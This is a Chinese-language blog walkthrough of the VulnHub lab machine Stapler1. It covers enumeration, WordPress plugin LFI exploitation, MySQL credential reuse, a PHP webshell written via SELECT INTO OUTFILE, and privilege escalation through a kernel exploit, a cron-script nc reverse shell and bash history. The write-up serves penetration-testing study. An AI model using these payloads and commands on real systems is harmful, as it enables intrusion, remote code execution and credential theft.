<!DOCTYPE html>
<html lang="zh-Hans">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"evilarsene.icu","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":-1,"unescape":true,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>


  <meta name="description" content="Stapler1kali:192.168.1.201">
<meta property="og:type" content="article">
<meta property="og:title" content="靶场Stapler1">
<meta property="og:url" content="http://evilarsene.icu/2020/09/13/%E9%9D%B6%E5%9C%BAStapler1/index.html">
<meta property="og:site_name" content="Love ❤ Hacking">
<meta property="og:description" content="Stapler1kali:192.168.1.201">
<meta property="og:locale">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/2.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/1.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/3.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/8.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/4.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/5.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/6.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/7.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/10.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/11.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/12.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/13.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/14.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/15.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/16.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/17.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/18.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/19.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/20.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/21.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/22.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/23.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/24.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/25.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/26.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/27.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/28.png">
<meta property="og:image" content="http://evilarsene.icu/images/Stapler1/29.png">
<meta property="article:published_time" content="2020-09-13T06:17:35.000Z">
<meta property="article:modified_time" content="2020-09-13T09:56:03.957Z">
<meta property="article:author" content="EvilArsene">
<meta property="article:tag" content="Linux靶机">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://evilarsene.icu/images/Stapler1/2.png">

<link rel="canonical" href="http://evilarsene.icu/2020/09/13/%E9%9D%B6%E5%9C%BAStapler1/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-Hans'
  };
</script>

  <title>靶场Stapler1 | Love ❤ Hacking</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>
    <a target="_blank" rel="noopener" href="https://github.com/TZESS" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Love ❤ Hacking</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">trickster</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-Hans">
    <link itemprop="mainEntityOfPage" href="http://evilarsene.icu/2020/09/13/%E9%9D%B6%E5%9C%BAStapler1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpg">
      <meta itemprop="name" content="EvilArsene">
      <meta itemprop="description" content="人格面具操控者 <img src="http://www.hackthebox.eu/badge/image/278745" alt="Hack The Box">">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Love ❤ Hacking">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          靶场Stapler1
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2020-09-13 14:17:35 / 修改时间：17:56:03" itemprop="dateCreated datePublished" datetime="2020-09-13T14:17:35+08:00">2020-09-13</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/vulnhub/" itemprop="url" rel="index"><span itemprop="name">vulnhub</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="Stapler1"><a href="#Stapler1" class="headerlink" title="Stapler1"></a>Stapler1</h1><p>kali:192.168.1.201</p>
<p>目标:192.168.1.207</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">masscan -p1-65535 192.168.1.207 --rate&#x3D;1000 -e eth0 &gt; ports</span><br><span class="line">ports&#x3D;$(cat ports | awk -F &quot; &quot; &#39;&#123;print $4&#125;&#39; | awk -F &quot;&#x2F;&quot; &#39;&#123;print $1&#125;&#39; | sort -n | tr &#39;\n&#39; &#39;,&#39; | sed &#39;s&#x2F;,$&#x2F;&#x2F;&#39;)</span><br><span class="line">nmap -Pn -sV -sC -p$ports 192.168.1.207 -oN nmap</span><br></pre></td></tr></table></figure>

<p>nmap发现</p>
<p>21(ftp),22(SSH),53(DNS),80(http),139(smb),666,3306(mysql),12380(http)</p>
<h3 id="枚举"><a href="#枚举" class="headerlink" title="枚举"></a>枚举</h3><p>ftp允许匿名登录，发现文件，<code>put</code>无法写入</p>
<p><img src="/images/Stapler1/2.png" alt="2"></p>
<p>发现了潜在的用户名</p>
<p>smb枚举</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">smbmap -H 192.168.1.207 -R --depth 5 -P 139</span><br></pre></td></tr></table></figure>

<p><img src="/images/Stapler1/1.png" alt="1"></p>
<p>web目录枚举<br>分别枚举80端口和12380端口，但都没有什么发现<br>可以发现，手动尝试访问12380端口的任意文件，都会返回400。所以手动尝试https访问(之前的Nmap并没有扫描出SSL信息，看来是遗漏了)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">gobuster dir -w &#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;dirbuster&#x2F;directory-list-2.3-medium.txt -u https:&#x2F;&#x2F;192.168.1.207:12380 -t 50 -k</span><br><span class="line"></span><br><span class="line">&#x2F;announcements&#x2F;</span><br><span class="line">&#x2F;phpmyadmin&#x2F;</span><br><span class="line">&#x2F;icons&#x2F;</span><br><span class="line">&#x2F;javascript&#x2F;</span><br><span class="line">&#x2F;server-status&#x2F;</span><br></pre></td></tr></table></figure>

<p>再运行nikto，发现了robots.txt</p>
<p><img src="/images/Stapler1/3.png" alt="3"></p>
<p>手动检查这些目录，可以发现有价值的信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;blogblog&#x2F;		wordpress</span><br><span class="line">&#x2F;phpmyadmin&#x2F;</span><br></pre></td></tr></table></figure>

<h2 id="渗透"><a href="#渗透" class="headerlink" title="渗透"></a>渗透</h2><p>直接用wpscan进行扫描</p>
<p>先进行了vp扫描，但是只发现了akismet，而该插件基本都是xss<br>我们可以手动尝试枚举，或进行更详细的ap扫描</p>
<p>手动</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&#x2F;wp-content&#x2F;plugins&#x2F;</span><br><span class="line">https:&#x2F;&#x2F;192.168.1.207:12380&#x2F;blogblog&#x2F;wp-content&#x2F;plugins&#x2F;</span><br></pre></td></tr></table></figure>

<p><img src="/images/Stapler1/8.png" alt="8"></p>
<p>ap扫描</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wpscan --api-token **** --url https:&#x2F;&#x2F;192.168.1.207:12380&#x2F;blogblog&#x2F; --disable-tls-checks --enumerate ap --plugins-detection aggressive</span><br></pre></td></tr></table></figure>

<p>这次我们发现了信息</p>
<p><img src="/images/Stapler1/4.png" alt="4"></p>
<p>直接寻找公开漏洞</p>
<p><img src="/images/Stapler1/5.png" alt="5"></p>
<p>修改exp</p>
<p><img src="/images/Stapler1/6.png" alt="6"></p>
<p>尝试运行</p>
<p><img src="/images/Stapler1/7.png" alt="7"></p>
<p>这里会遇到一个非常常见的SSL验证错误，我们可以取消证书验证</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">import ssl</span><br><span class="line"></span><br><span class="line">ssl._create_default_https_context &#x3D; ssl._create_unverified_context</span><br></pre></td></tr></table></figure>

<p>这样脚本运行成功，现在分析一下它的行为<br>它似乎包含了一个非常重要的文件wp-config.php，并以图片的格式进行了上传</p>
<p>我们访问<a target="_blank" rel="noopener" href="https://192.168.1.207:12380/blogblog/%E5%8F%AF%E4%BB%A5%E5%8F%91%E7%8E%B0%E7%A1%AE%E5%AE%9E%E5%A4%9A%E4%BA%86%E5%87%A0%E7%AF%87%E6%96%87%E7%AB%A0%EF%BC%8C%E7%8E%B0%E5%9C%A8%E9%9C%80%E8%A6%81%E6%89%BE%E5%88%B0%E5%AE%83%E7%9A%84%E4%BD%8D%E7%BD%AE">https://192.168.1.207:12380/blogblog/可以发现确实多了几篇文章，现在需要找到它的位置</a><br>简单寻找，可以在<a target="_blank" rel="noopener" href="https://192.168.1.207:12380/blogblog/wp-content/uploads/%E5%8F%91%E7%8E%B0%E5%AE%83%E4%BB%AC%E7%9A%84%E4%BD%8D%E7%BD%AE">https://192.168.1.207:12380/blogblog/wp-content/uploads/发现它们的位置</a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -k https:&#x2F;&#x2F;192.168.1.207:12380&#x2F;blogblog&#x2F;wp-content&#x2F;uploads&#x2F;1791571933.jpeg</span><br></pre></td></tr></table></figure>

<p>我们就可以轻松读取到这些信息</p>
<p><img src="/images/Stapler1/10.png" alt="10"></p>
<p>当然也可以利用LFI读取其他文件，只要先去访问LFI漏洞页面，就会在uploads生成文件，访问即可，比如/etc/passwd</p>
<p><img src="/images/Stapler1/11.png" alt="11"></p>
<p>现在我们获得了mysql的凭据，我们可以尝试远程登录到mysql</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mysql -u root -h 192.168.1.207 -pplbkac</span><br></pre></td></tr></table></figure>

<p><img src="/images/Stapler1/12.png" alt="12"></p>
<h3 id="方法1wordpress后台"><a href="#方法1wordpress后台" class="headerlink" title="方法1wordpress后台"></a>方法1wordpress后台</h3><p>在获取mysql会话后，我们可以应该想到读取wordpress存储的用户凭证，在后台getshell，这是一个比较简单快捷的方式</p>
<p><img src="/images/Stapler1/13.png" alt="13"></p>
<p>将该表保存到文件<code>hash</code>中，提取第四段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">awk -F &#39;|&#39; &#39;&#123;print $4&#125;&#39; hash &gt;hash.txt</span><br></pre></td></tr></table></figure>

<p>逐个用john破解密码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">john password --wordlist&#x3D;&#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt</span><br></pre></td></tr></table></figure>

<p>得到凭据<code>john/incorrect</code></p>
<p>后台登录安装插件</p>
<p><img src="/images/Stapler1/14.png" alt="14"></p>
<p>不知道文件插件被安装到哪里了，返回到wp-content里寻找</p>
<p><img src="/images/Stapler1/15.png" alt="15"></p>
<p>成功发现，这样就可以getshell了</p>
<p><img src="/images/Stapler1/16.png" alt="16"></p>
<h3 id="方法2mysql写shell"><a href="#方法2mysql写shell" class="headerlink" title="方法2mysql写shell"></a>方法2mysql写shell</h3><p>可以直接使用mysql的outfile尝试写webshell到常见的web目录中，看是否有运气</p>
<p>尝试直接写到web跟目录失败，权限问题<br>尝试写到uploads目录，成功</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select &quot;&lt;?php system($_GET[&#39;cmd&#39;]); ?&gt;&quot; into outfile &quot;&#x2F;var&#x2F;www&#x2F;https&#x2F;blogblog&#x2F;wp-content&#x2F;uploads&#x2F;evil.php&quot;;</span><br></pre></td></tr></table></figure>

<p><img src="/images/Stapler1/17.png" alt="17"></p>
<p>这样我们就可以获得RCE</p>
<p><img src="/images/Stapler1/18.png" alt="18"></p>
<p>可以通过它来进行反弹shell</p>
<p><img src="/images/Stapler1/19.png" alt="19"></p>
<h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>linpeas扫描</p>
<h3 id="方法1内核提权"><a href="#方法1内核提权" class="headerlink" title="方法1内核提权"></a>方法1内核提权</h3><p><img src="/images/Stapler1/20.png" alt="20"></p>
<p>寻找exp</p>
<p><img src="/images/Stapler1/21.png" alt="21"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">wget http:&#x2F;&#x2F;192.168.1.201&#x2F;tmp&#x2F;39772.zip</span><br><span class="line">unzip 39772.zip</span><br><span class="line">cd 39772</span><br><span class="line">tar -xvf exploit.tar</span><br><span class="line">cd ebpf_mapfd_doubleput_exploit</span><br><span class="line">compile.sh</span><br></pre></td></tr></table></figure>

<p>编译会产生警告，忽略它们</p>
<p><img src="/images/Stapler1/22.png" alt="22"></p>
<p>运行即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.&#x2F;doubleput</span><br></pre></td></tr></table></figure>

<p><img src="/images/Stapler1/23.png" alt="23"></p>
<h3 id="方法2计划任务"><a href="#方法2计划任务" class="headerlink" title="方法2计划任务"></a>方法2计划任务</h3><p><img src="/images/Stapler1/24.png" alt="24"></p>
<p><img src="/images/Stapler1/25.png" alt="25"></p>
<p><img src="/images/Stapler1/26.png" alt="26"></p>
<p>找到了可以写入的计划任务，是个shell脚本，直接写入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &quot;rm &#x2F;tmp&#x2F;ff;mkfifo &#x2F;tmp&#x2F;ff;cat &#x2F;tmp&#x2F;ff|&#x2F;bin&#x2F;sh -i 2&gt;&amp;1|nc 192.168.1.201 5555 &gt;&#x2F;tmp&#x2F;ff&quot; &gt; &#x2F;usr&#x2F;local&#x2F;sbin&#x2F;cron-logrotate.sh</span><br></pre></td></tr></table></figure>

<p><img src="/images/Stapler1/27.png" alt="27"></p>
<h3 id="方法3历史命令"><a href="#方法3历史命令" class="headerlink" title="方法3历史命令"></a>方法3历史命令</h3><p>寻找当前账户可以读取的.bash_history</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find &#x2F;home -name &quot;.bash_history&quot; -exec cat &#123;&#125; \;</span><br></pre></td></tr></table></figure>

<p><img src="/images/Stapler1/28.png" alt="28"></p>
<p>发现可以切换到peter</p>
<p><img src="/images/Stapler1/29.png" alt="29"></p>
<p>而且发现，peter属于sodo组，并能sudo任何程序</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo &#x2F;bin&#x2F;bash -p</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/Linux%E9%9D%B6%E6%9C%BA/" rel="tag"># Linux靶机</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/09/08/HTB-Passage/" rel="prev" title="HTB:Passage">
      <i class="fa fa-chevron-left"></i> HTB:Passage
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/09/13/%E9%9D%B6%E5%9C%BAVulnOS-2/" rel="next" title="靶场VulnOS 2">
      靶场VulnOS 2 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Stapler1"><span class="nav-number">1.</span> <span class="nav-text">Stapler1</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-number">1.1.</span> <span class="nav-text">信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F"><span class="nav-number">1.1.1.</span> <span class="nav-text">端口扫描</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9E%9A%E4%B8%BE"><span class="nav-number">1.1.2.</span> <span class="nav-text">枚举</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B8%97%E9%80%8F"><span class="nav-number">1.2.</span> <span class="nav-text">渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%951wordpress%E5%90%8E%E5%8F%B0"><span class="nav-number">1.2.1.</span> <span class="nav-text">方法1wordpress后台</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%952mysql%E5%86%99shell"><span class="nav-number">1.2.2.</span> <span class="nav-text">方法2mysql写shell</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8F%90%E6%9D%83"><span class="nav-number">1.3.</span> <span class="nav-text">提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%951%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83"><span class="nav-number">1.3.1.</span> <span class="nav-text">方法1内核提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%952%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1"><span class="nav-number">1.3.2.</span> <span class="nav-text">方法2计划任务</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%953%E5%8E%86%E5%8F%B2%E5%91%BD%E4%BB%A4"><span class="nav-number">1.3.3.</span> <span class="nav-text">方法3历史命令</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="EvilArsene"
      src="/images/touxiang.jpg">
  <p class="site-author-name" itemprop="name">EvilArsene</p>
  <div class="site-description" itemprop="description">人格面具操控者 <img src="http://www.hackthebox.eu/badge/image/278745" alt="Hack The Box"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">145</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">9</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://weibo.com/TZESS" title="Weibo → https:&#x2F;&#x2F;weibo.com&#x2F;TZESS" rel="noopener" target="_blank"><i class="fa fa-fw fa-weibo"></i>Weibo</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/Arsene_IP" title="Twitter → https:&#x2F;&#x2F;twitter.com&#x2F;Arsene_IP" rel="noopener" target="_blank"><i class="fa fa-fw fa-twitter"></i>Twitter</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">EvilArsene</span>
</div>

<span id="sitetime"></span>
<script language=javascript>
	function siteTime(){
		window.setTimeout("siteTime()", 1000);
		var seconds = 1000;
		var minutes = seconds * 60;
		var hours = minutes * 60;
		var days = hours * 24;
		var years = days * 365;
		var today = new Date();
		var todayYear = today.getFullYear();
		var todayMonth = today.getMonth()+1;
		var todayDate = today.getDate();
		var todayHour = today.getHours();
		var todayMinute = today.getMinutes();
		var todaySecond = today.getSeconds();
		/* Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
		year - 作为date对象的年份，为4位年份值
		month - 0-11之间的整数，做为date对象的月份
		day - 1-31之间的整数，做为date对象的天数
		hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
		minutes - 0-59之间的整数，做为date对象的分钟数
		seconds - 0-59之间的整数，做为date对象的秒数
		microseconds - 0-999之间的整数，做为date对象的毫秒数 */
		var t1 = Date.UTC(2018,02,13,15,00,00); //北京时间2018-2-13 00:00:00
		var t2 = Date.UTC(todayYear,todayMonth,todayDate,todayHour,todayMinute,todaySecond);
		var diff = t2-t1;
		var diffYears = Math.floor(diff/years);
		var diffDays = Math.floor((diff/days)-diffYears*365);
		var diffHours = Math.floor((diff-(diffYears*365+diffDays)*days)/hours);
		var diffMinutes = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours)/minutes);
		var diffSeconds = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours-diffMinutes*minutes)/seconds);
